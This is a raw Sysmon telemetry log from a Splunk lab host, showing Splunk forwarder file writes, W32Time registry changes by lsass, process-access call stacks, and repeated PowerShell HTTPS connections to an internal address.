23542300x800000000000000035127641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:56.758{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9B96FAB02643A637069C9B9EB5B982A,SHA256=18CF9C9DA845675FB50100318F09C66A8A526FD26222B0B0943D53BE8301526C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:57.772{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA7C6FFB49787D4D7E6CFD927DCFC2AD,SHA256=9D5CA149DBB1440B3BDCA8B30F8445EDE91FE436DE9344E447DB1C9F6F73F0F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:58.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67C821531C2483947E66CD416879985A,SHA256=ADE6A9FDA52073E16C15857BC88E80E6FE10FA46DF4DF62275E70EE206FF32DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:59.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA4AE6AD8755DA4B51780D92E9B8E8E3,SHA256=12A1EFE7402201D277C94F4D961E1BFC3626D61AE4DF47C1E12A94417552283B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:24.220{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62057-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035127645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:23.283{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62056-false10.0.1.12-8000- 23542300x800000000000000035127644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:59.087{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=63D3C20F24F5F85E9FFDD47B49D7DF52,SHA256=750FA978EA655EFB751B1EED3BCC05F1786CBCBB42E8B5F7539B2A9739658DC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:00.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAF7984C25DA5FEFEB936A01C2A41689,SHA256=15FD320476C90A3B711C47E3DA2A514F150BC86FD58EAC2D19CEE9F8A0A611DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:00.002{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:01.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D129954BF4FA29B3015AD235E32B71,SHA256=1CF690613C5DE0F9133E7B3510063448E2DA6C1655CB200218B36AC0DF6B9B01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62058-false10.0.1.12-8089- 23542300x800000000000000035127652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:02.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FEE41744B71261D0761EB7841FC0FBA,SHA256=976C6B1A9E1BC390550C015202F7731A834D6917283DEF008E0B214686904941,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:03.921{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90A08C66CF809F6A77808C1D0DC704C7,SHA256=ED1F0543708370796A3F6D4C26226B7BAA891F000C5D7D71420DAD623156B896,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:28.233{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62059-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:03.300{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6396DD11228F8E7F6C2C96D1BD931D9C,SHA256=76EE07CA218593394F2F97D4C698F3D56F92415D4FBD3711398996D29B4FCCF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:04.935{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C92DC9E1047DBD0B344BEB04FD562AA1,SHA256=FA56C2BF21634BFAC09932614877BEB36A1BFD74394955168061116EB09BB450,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:28.364{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62060-false10.0.1.12-8000- 23542300x800000000000000035127658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:05.950{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EDD365AF201C3A8254C2A16EDBCE83F,SHA256=6B05C2504DA62B52DFE2B0734BD807293016FCA8C106AB16ACA020771C583317,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:06.980{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=896ADB598A491FA237BAA8A5C8C7DC89,SHA256=97B98581DE8587852E9BC116AAC3B5EB73FC609F34306B2B3AAD78CCB0AA5255,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:07.994{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021B134A722EB99807818EDCCDDE89EB,SHA256=4D0278CA607C5339ACB5C326BEF35AF3646733A12F345C2AA87A08DC245987E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:32.245{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62061-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:07.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=812740A77B233C4AA43090055199FB8A,SHA256=A0FCDE74E25077080DA466CD0B86D493BD614C26C2E58345ACDCCD8EC3BF01E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:33.375{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62062-false10.0.1.12-8000- 23542300x800000000000000035127664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:09.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC5A72256DD6E8D0FEA3025B352EBAB8,SHA256=5CFE56CEEB3046F7E91CBF6777234C3144190856DBBC2615C32039359996A48D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035127684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035127683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x724ce6d5) 13241300x800000000000000035127682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a5bc-0xfa1a7275) 13241300x800000000000000035127681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5c5-0x5bdeda75) 13241300x800000000000000035127680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5cd-0xbda34275) 13241300x800000000000000035127679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035127678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x724ce6d5) 13241300x800000000000000035127677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a5bc-0xfa1a7275) 13241300x800000000000000035127676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5c5-0x5bdeda75) 13241300x800000000000000035127675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:55:10.561{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5cd-0xbda34275) 10341000x800000000000000035127674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.545{B81B27B7-82BE-613A-B696-03000000C801}62526488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.392{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82BE-613A-B696-03000000C801}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.392{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.392{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.392{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.392{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.392{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82BE-613A-B696-03000000C801}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.392{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82BE-613A-B696-03000000C801}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.377{B81B27B7-82BE-613A-B696-03000000C801}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:10.030{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94CF3C0173A8E78466678C919646270C,SHA256=21F43D07CA72F0CF29155A50264B51ABA29B3269FFF26E2D4D701685E9B41356,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:36.257{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62063-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.391{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5063A273BCC94106F69C41A4CA9144E9,SHA256=416E64EB55E148C1246D69B5516AE38909BD7B954DE1A82CB485EAA08D94B118,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.391{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26B2BA3B1DF5FA33A4705DF0D7B71785,SHA256=85832FD2102E3C142CD2EDDA207FA48D5DCA55E44004DE7D2EDB986B0853D5BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.091{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7A7CB9251D764E251551206D100C8E81,SHA256=8DD9ACF337C873B3B2F78A9EF2B84769841C125BDE57E18D08BFE891BBD97E93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:11.091{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82BF-613A-B796-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 